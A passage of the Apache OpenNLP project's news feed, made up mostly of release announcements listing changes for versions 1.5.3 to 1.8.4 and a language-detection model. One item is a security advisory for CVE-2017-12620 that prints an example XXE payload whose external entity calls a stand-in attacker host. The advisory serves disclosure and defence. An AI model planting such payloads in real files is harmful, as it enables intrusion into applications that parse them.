| <p>Apache OpenNLP 1.8.4 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_8_4">What&#8217;s new in Apache OpenNLP 1.8.4</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces new features, improvements and bug fixes. Java 1.8 and Maven 3.3.9 are required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Remove Tokenizer param from Doccat trainer CLI</p> |
| </li> |
| <li> |
| <p>Add annotator notes to BratAnnotator</p> |
| </li> |
| <li> |
| <p>Add 20Newsgroups format support to the doccat component</p> |
| </li> |
| <li> |
| <p>Removed WordVector toArray methods</p> |
| </li> |
| <li> |
| <p>Removed deprecated leipzig doccat format support</p> |
| </li> |
| <li> |
| <p>Add filename to overlapping annotation exception in NameSample</p> |
| </li> |
| <li> |
| <p>Resolved concurrency issue in POS tagger</p> |
| </li> |
| <li> |
| <p>Brat Annotation Service does not serialize results appropriately</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Language Detector Model for Apache OpenNLP released</title> |
| <link>https://opennlp.apache.org/news/model-langdetect-183.html</link> |
| <pubDate>Thu, 2 Nov 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/model-langdetect-183.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>TThe Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Language Detector Model 1.8.3 for Apache OpenNLP 1.8.3. |
| The Language Detector Model can detect 103 languages and outputs ISO 639-3 codes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP model and reports are available for download from our |
| <a href="https://opennlp.apache.org/models.html">model download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>This is the first release of the Language Detector Model. It is compatible with Apache OpenNLP 1.8.3 or better.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It is important to note that this model is trained for and works well with longer texts that have at least two sentences or more from the same language.</p> |
| </div> |
| <div class="paragraph"> |
| <p>More information about this release can be found in the <em>README.txt</em> at: |
| <a href="https://www.apache.org/dist/opennlp/models/langdetect/1.8.3/README.txt" class="bare">https://www.apache.org/dist/opennlp/models/langdetect/1.8.3/README.txt</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>Details about this model effectiveness can be found in the following report: |
| <a href="https://www.apache.org/dist/opennlp/models/langdetect/1.8.3/langdetect-183.bin.report.txt" class="bare">https://www.apache.org/dist/opennlp/models/langdetect/1.8.3/langdetect-183.bin.report.txt</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.8.3 released</title> |
| <link>https://opennlp.apache.org/news/release-183.html</link> |
| <pubDate>Fri, 27 Oct 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-183.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of Apache OpenNLP 1.8.3.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Apache OpenNLP 1.8.3 binary and source distributions are available for download from our download page: <a href="/download.html">download page</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="/maven-dependency.html">Maven Dependency</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_8_3">What&#8217;s new in Apache OpenNLP 1.8.3</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces new features, improvements and bug fixes. Java 1.8 and Maven 3.3.9 are required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes: |
| - New experimental API for Word Vectors and support for Glove vector files |
| - Code cleanups and addition of test cases |
| - Java 9 module name is now set to org.apache.opennlp.tools |
| - All Sample objects now implement Serializable to better work with distributed frameworks like Apache Flink</p> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the README.html file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>CVE-2017-12620 - Apache OpenNLP XXE vulnerability</title> |
| <link>https://opennlp.apache.org/news/cve-2017-12620.html</link> |
| <pubDate>Mon, 2 Oct 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/cve-2017-12620.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>Severity: Medium</p> |
| </div> |
| <div class="paragraph"> |
| <p>Vendor: |
| The Apache Software Foundation</p> |
| </div> |
| <div class="paragraph"> |
| <p>Versions Affected:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>OpenNLP 1.5.0 to 1.5.3</p> |
| </li> |
| <li> |
| <p>OpenNLP 1.6.0</p> |
| </li> |
| <li> |
| <p>OpenNLP 1.7.0 to 1.7.2</p> |
| </li> |
| <li> |
| <p>OpenNLP 1.8.0 to 1.8.1</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>Description: |
| When loading models or dictionaries that contain XML it is possible to |
| perform an XXE attack, since OpenNLP is a library, this only affects |
| applications that load models or dictionaries from untrusted sources.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Mitigation: |
| All users who load models or XML dictionaries from untrusted sources |
| should update to 1.8.2.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Example:</p> |
| </div> |
| <div class="paragraph"> |
| <p>An attacker can place this:</p> |
| </div> |
| <div class="listingblock"> |
| <div class="content"> |
| <pre class="prettyprint highlight"><code data-lang="xml">&lt;?xml version="1.0" ?&gt; |
| &lt;!DOCTYPE r [ |
| &lt;!ELEMENT r ANY &gt; |
| &lt;!ENTITY sp SYSTEM "http://evil.attacker.com/"&gt; |
| ]&gt; |
| &lt;r&gt;&amp;sp;&lt;/r&gt;</code></pre> |
| </div> |
| </div> |
| <div class="paragraph"> |
| <p>Inside one of the XML files, either a dictionary or embedded inside a |
| model package, to demonstrate this vulnerability.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Credit: |
| This issue was discovered by Nishil Shah of Salesforce.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.8.2 released</title> |
| <link>https://opennlp.apache.org/news/release-182.html</link> |
| <pubDate>Fri, 15 Sep 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-182.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.8.2 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.8.2 binary and source distributions are available for download from our <a href="/download.html">download page</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the <a href="/maven-dependency.html">Maven Dependency</a> page for more details.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Java 8 is required. Maven 3.3.9 is required for building the Source Distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>To build everything execute the following command in the root folder: <code>mvn clean install</code></p> |
| </div> |
| <div class="paragraph"> |
| <p>The results of the build will be placed in: <code>opennlp-distr/target/apache-opennlp-1.8.2-bin.tar.gz</code> (or <code>.zip</code>)</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_8_2">What&#8217;s new in Apache OpenNLP 1.8.2</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces some minor improvements and bug fixes. Java 1.8 is required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The release contains the following noteworthy changes: |
| - The Leipzig format support was improved to extract data for langdetect model training |
| - Maxents loglikelihood threshold can be configured by the user |
| - Added data verification for the eval data |
| - Fixed handling of xml parsers used through out the package</p> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Thanks again to all contributors and committers for their help.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.8.1 released</title> |
| <link>https://opennlp.apache.org/news/release-181.html</link> |
| <pubDate>Sat, 8 Jul 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-181.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.8.1 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.8.1 binary and source distributions are available for download from our <a href="/download.html">download page</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the <a href="/maven-dependency.html">Maven Dependency</a> page for more details.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Java 1.8 is required to run OpenNLP Maven 3.3.9 is required for building it building from the Source Distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>To build everything execute the following command in the root folder: <code>mvn clean install</code></p> |
| </div> |
| <div class="paragraph"> |
| <p>The results of the build will be placed in: <code>opennlp-distr/target/apache-opennlp-1.8.1-bin.tar.gz</code> (or <code>.zip</code>)</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_8_1">What&#8217;s new in Apache OpenNLP 1.8.1</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes. The API has been improved for a better consistency and many deprecated methods were removed. Java 1.8 is required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>A new Language Detection Component</p> |
| </li> |
| <li> |
| <p>Support for Irish Sentence Bank formats</p> |
| </li> |
| <li> |
| <p>Support to train the sentence detector and tokenizer on the UD corpus</p> |
| </li> |
| <li> |
| <p>Evaluation tests now support ISO-639-3 language codes</p> |
| </li> |
| <li> |
| <p>Convenience methods to load models from a path</p> |
| </li> |
| <li> |
| <p>Refactored the Data Indexer Code</p> |
| </li> |
| <li> |
| <p>Optimized NGram creation loop to better leverage CPU cache</p> |
| </li> |
| <li> |
| <p>Refactored BratNameSampleStream</p> |
| </li> |
| <li> |
| <p>Remove deprecated code from util package</p> |
| </li> |
| <li> |
| <p>Redesigned web site - <a href="https://opennlp.apache.org" class="bare">https://opennlp.apache.org</a></p> |
| </li> |
| <li> |
| <p>New logo for the project</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Thanks again to all contributors and committers for their help.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.8.0 released</title> |
| <link>https://opennlp.apache.org/news/release-180.html</link> |
| <pubDate>Fri, 19 May 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-180.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.8.0 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.8.0 binary and source distributions are available for download from our <a href="/download.html">download page</a>.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the <a href="/maven-dependency.html">Maven Dependency</a> page for more details.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Java 1.8 is required to run OpenNLP Maven 3.3.9 is required for building it building from the Source Distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>To build everything execute the following command in the root folder: <code>mvn clean install</code></p> |
| </div> |
| <div class="paragraph"> |
| <p>The results of the build will be placed in: <code>opennlp-distr/target/apache-opennlp-1.8.0-bin.tar.gz</code> (or <code>.zip</code>)</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="whats_new_in_apache_opennlp_1_8_0">What&#8217;s new in Apache OpenNLP 1.8.0</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes. The API has been improved for a better consistency and many deprecated methods were removed. Java 1.8 is required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>POS Tagger context generator now supports feature generation XML</p> |
| </li> |
| <li> |
| <p>Add a Name Finder feature generator that adds POS Tag features</p> |
| </li> |
| <li> |
| <p>Add CONLL-U format support</p> |
| </li> |
| <li> |
| <p>Improve default Name Finder settings</p> |
| </li> |
| <li> |
| <p>TokenNameFinderEvaluator CLI now support nameTypes argument</p> |
| </li> |
| <li> |
| <p>Stupid backoff is now the default in NGramLanguageModel</p> |
| </li> |
| <li> |
| <p>Language codes now are ISO 639-3 compliant</p> |
| </li> |
| <li> |
| <p>Add many unit tests</p> |
| </li> |
| <li> |
| <p>Distribution package now includes example parameters file</p> |
| </li> |
| <li> |
| <p>Now prefix and suffix feature generators are configurable</p> |
| </li> |
| <li> |
| <p>Remove API in Document Categorizer for user specified tokenizer</p> |
| </li> |
| <li> |
| <p>Learnable lemmatizer now returns all possible lemmas for a given word and pos tag</p> |
| </li> |
| <li> |
| <p>Lemmatizer API backward compatibility break: no need to encode/decode lemmas anymore, now LemmatizerME lemmatize method returns the actual lemma</p> |
| </li> |
| <li> |
| <p>Add stemmer, detokenizer and sentence detection abbreviations for Irish</p> |
| </li> |
| <li> |
| <p>Chunker SequenceValidator signature changed to allow access to both token and POS tag</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Thanks again to all contributors and committers for their help.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.7.2 released</title> |
| <link>https://opennlp.apache.org/news/release-172.html</link> |
| <pubDate>Sat, 4 Feb 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-172.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.7.2 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.7.2 binary and source distributions are available for download from our download page: <a href="https://opennlp.apache.org/cgi-bin/download.cgi" class="bare">https://opennlp.apache.org/cgi-bin/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="https://opennlp.apache.org/maven-dependency.html" class="bare">https://opennlp.apache.org/maven-dependency.html</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="requirements">Requirements</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>Java 1.8 is required to run OpenNLP |
| Maven 3.3.9 is required for building it</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="building_from_the_source_distribution">Building from the Source Distribution</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>To build everything execute the following command in the root folder: |
| mvn clean install</p> |
| </div> |
| <div class="paragraph"> |
| <p>The results of the build will be placed in: |
| opennlp-distr/target/apache-opennlp-1.7.2-bin.tar-gz (or .zip)</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="what_is_new_in_apache_opennlp_1_7_2">What is new in Apache OpenNLP 1.7.2</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes. The API |
| has been improved for a better consistency and 1.4 deprecated methods were |
| removed. Now Java 1.8 is required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Name Finder evaluation can now show a confusion matrix</p> |
| </li> |
| <li> |
| <p>The default evaluation output contains more details</p> |
| </li> |
| <li> |
| <p>Added a Language Model CLI tool</p> |
| </li> |
| <li> |
| <p>Add Moses format support</p> |
| </li> |
| <li> |
| <p>More refactoring and cleanup, specially in Machine Learning package and Dictionary</p> |
| </li> |
| <li> |
| <p>Removed deprecated trainers from UIMA integration</p> |
| </li> |
| <li> |
| <p>Fixed potential localization issues and added maven plugin to prevent it (ForbiddenAPI)</p> |
| </li> |
| <li> |
| <p>Fixed issues with the BRAT corpus reader</p> |
| </li> |
| <li> |
| <p>Deprecated GIS class, will be removed in a future 1.8.x release</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release |
| notes.</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.7.1 released</title> |
| <link>https://opennlp.apache.org/news/release-171.html</link> |
| <pubDate>Mon, 23 Jan 2017 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-171.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.7.1 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.7.1 binary and source distributions are available for download from our download page: <a href="https://opennlp.apache.org/cgi-bin/download.cgi" class="bare">https://opennlp.apache.org/cgi-bin/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="https://opennlp.apache.org/maven-dependency.html" class="bare">https://opennlp.apache.org/maven-dependency.html</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="requirements">Requirements</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>Java 1.8 is required to run OpenNLP. |
| Maven 3.3.9 is required for building it.</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="building_from_the_source_distribution">Building from the Source Distribution</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>To build everything execute the following command in the root folder:</p> |
| </div> |
| <div class="literalblock"> |
| <div class="content"> |
| <pre>mvn clean install</pre> |
| </div> |
| </div> |
| <div class="paragraph"> |
| <p>The results of the build will be placed in: |
| <em>opennlp-distr/target/apache-opennlp-1.7.1-bin.tar.gz</em> |
| (or <em>.zip</em>)</p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="what_is_new_in_apache_opennlp_1_7_1">What is new in Apache OpenNLP 1.7.1</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Travis CI Integration</p> |
| </li> |
| <li> |
| <p>Added support to LETSMT format</p> |
| </li> |
| <li> |
| <p>All stdout can be disabled during training via verbose parameter</p> |
| </li> |
| <li> |
| <p>Improved and extended evaluation tests</p> |
| </li> |
| <li> |
| <p>Refactoring and cleanup of code base</p> |
| </li> |
| <li> |
| <p>Code fully migrated to Java 8</p> |
| </li> |
| <li> |
| <p>Added an improved GitHub README page</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the RELEASE_NOTES file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.7.0 released</title> |
| <link>https://opennlp.apache.org/news/release-170.html</link> |
| <pubDate>Sat, 31 Dec 2016 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-170.html</guid> |
| <description> |
| <div id="preamble"> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.7.0 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text.</p> |
| </div> |
| <div class="paragraph"> |
| <p>It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.7.0 binary and source distributions are available for download from our download page: <a href="https://opennlp.apache.org/cgi-bin/download.cgi" class="bare">https://opennlp.apache.org/cgi-bin/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: <a href="https://opennlp.apache.org/maven-dependency.html" class="bare">https://opennlp.apache.org/maven-dependency.html</a></p> |
| </div> |
| </div> |
| </div> |
| <div class="sect1"> |
| <h2 id="what_is_new_in_apache_opennlp_1_7_0">What is new in Apache OpenNLP 1.7.0</h2> |
| <div class="sectionbody"> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes. The API has been improved for a better consistency and deprecated methods were removed. Now Java 1.8 and Maven 3.3.9 are required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally, the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>OpenNLP is up to 50% faster at analyzing content</p> |
| </li> |
| <li> |
| <p>A lot of deprecated code has been removed</p> |
| </li> |
| <li> |
| <p>Code base has been cleaned up</p> |
| </li> |
| <li> |
| <p>There is a new brat annotation service</p> |
| </li> |
| <li> |
| <p>Documentation was improved and extended</p> |
| </li> |
| <li> |
| <p>A Naive Bayesian Classifier implementation was added</p> |
| </li> |
| <li> |
| <p>Morfologik addon is now included</p> |
| </li> |
| <li> |
| <p>Added a language model component</p> |
| </li> |
| <li> |
| <p>Added a CLI to the lemmatizer component.</p> |
| </li> |
| <li> |
| <p>Added a supervised statistical lemmatizer.</p> |
| </li> |
| <li> |
| <p>The lemmatizer component API has been entirely rewritten. The changes in the previously existing Dictionary-based lemmatizer are not backward compatible.</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release |
| notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the RELEASE_NOTES file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </div> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.6.0 released</title> |
| <link>https://opennlp.apache.org/news/release-160.html</link> |
| <pubDate>Mon, 13 Jul 2015 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-160.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.6.0 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text. |
| It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, |
| named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.6.0 binary and source distributions are available for download from our download page: |
| <a href="https://opennlp.apache.org/cgi-bin/download.cgi" class="bare">https://opennlp.apache.org/cgi-bin/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: |
| <a href="https://opennlp.apache.org/maven-dependency.html" class="bare">https://opennlp.apache.org/maven-dependency.html</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>This release introduces many new features, improvements and bug fixes. The API |
| has been improved for a better consistency and 1.4 deprecated methods were |
| removed. Now Java 1.7 is required.</p> |
| </div> |
| <div class="paragraph"> |
| <p>Additionally the release contains the following noteworthy changes:</p> |
| </div> |
| <div class="ulist"> |
| <ul> |
| <li> |
| <p>Added evaluation support to the parser and doccat components</p> |
| </li> |
| <li> |
| <p>Added support to Evalita 07/09, Brat and OntoNotes corpus formats</p> |
| </li> |
| <li> |
| <p>Now L-BFGS is stable</p> |
| </li> |
| <li> |
| <p>Added Snowball to the Stemmer package</p> |
| </li> |
| <li> |
| <p>NameFinder now supports a user defined factory</p> |
| </li> |
| <li> |
| <p>Added pluggable machine learning support</p> |
| </li> |
| <li> |
| <p>Added a lemmatizer module</p> |
| </li> |
| <li> |
| <p>Added Cluster, Document Begin and Clark feature generators to the Name Finder</p> |
| </li> |
| <li> |
| <p>Added Liblinear as a Machine Learning addon</p> |
| </li> |
| <li> |
| <p>Entity Linker now has a command line interface</p> |
| </li> |
| <li> |
| <p>Added sequence classification support</p> |
| </li> |
| </ul> |
| </div> |
| <div class="paragraph"> |
| <p>A detailed list of the issues related to this release can be found in the release notes.</p> |
| </div> |
| <div class="paragraph"> |
| <p>For a complete list of fixed bugs and improvements please see the RELEASE_NOTES |
| file included in the distribution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>--The Apache OpenNLP Team</p> |
| </div> |
| </description> |
| </item> |
| <item> |
| <title>Apache OpenNLP 1.5.3 released</title> |
| <link>https://opennlp.apache.org/news/release-153.html</link> |
| <pubDate>Wed, 17 Apr 2013 00:00:00 +0000</pubDate> |
| <guid isPermaLink="false">news/release-153.html</guid> |
| <description> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP team is pleased to announce the release of version 1.5.3 of Apache OpenNLP.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The Apache OpenNLP library is a machine learning based toolkit for the processing of natural language text. |
| It supports the most common NLP tasks, such as tokenization, sentence segmentation, part-of-speech tagging, |
| named entity extraction, chunking, parsing, and coreference resolution.</p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP 1.5.3 binary and source distributions are available for download from our download page: |
| <a href="https://opennlp.apache.org/cgi-bin/download.cgi" class="bare">https://opennlp.apache.org/cgi-bin/download.cgi</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>The OpenNLP library is distributed by Maven Central as well. See the Maven Dependency page for more details: |
| <a href="https://opennlp.apache.org/maven-dependency.html" class="bare">https://opennlp.apache.org/maven-dependency.html</a></p> |
| </div> |
| <div class="paragraph"> |
| <p>This release contains a couple of new features, improvements and bug fixes. The CLI |
| has been improved for a better consistency. Now the tools supports extensions that |
| can be configured from the model, including customized context generators and |
| validators.</p> |
| </div> |
| <div class="paragraph"> |
